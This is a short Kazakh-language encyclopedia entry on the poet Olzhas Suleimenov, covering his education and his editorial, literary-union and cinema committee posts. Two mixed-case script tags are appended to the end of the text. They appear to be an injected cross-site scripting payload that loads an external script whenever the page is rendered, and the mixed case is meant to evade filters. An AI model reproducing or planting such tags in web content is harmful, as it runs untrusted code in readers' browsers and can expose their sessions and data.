СҮЛЕЙМЕНОВ Олжас Омар-ұлы (18.5.1936 ж. т., Алматы) — ақын, қоғам қайраткері, Қазақстанның халық жазушысы (1992). ҚазМУ-ды (қазіргі ҚазҰУ, 1959), Мәскеудегі М.Горький атынд. Әдебиет ин- тын бітірген. 1962 — 84 ж. “Казахстанская правда” газетінде, “Простор” журналында бөлім меңгерушісі, “Қазақфильм” киностудиясыңда сценарийлік-редакциялық алқаның бас редакторы, Қазақстан Жазушылар одағы баскармасының хатшысы, ҚР Кинематография жөніндегі мемл. к-т төрағасы қызметтерін атқарған.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>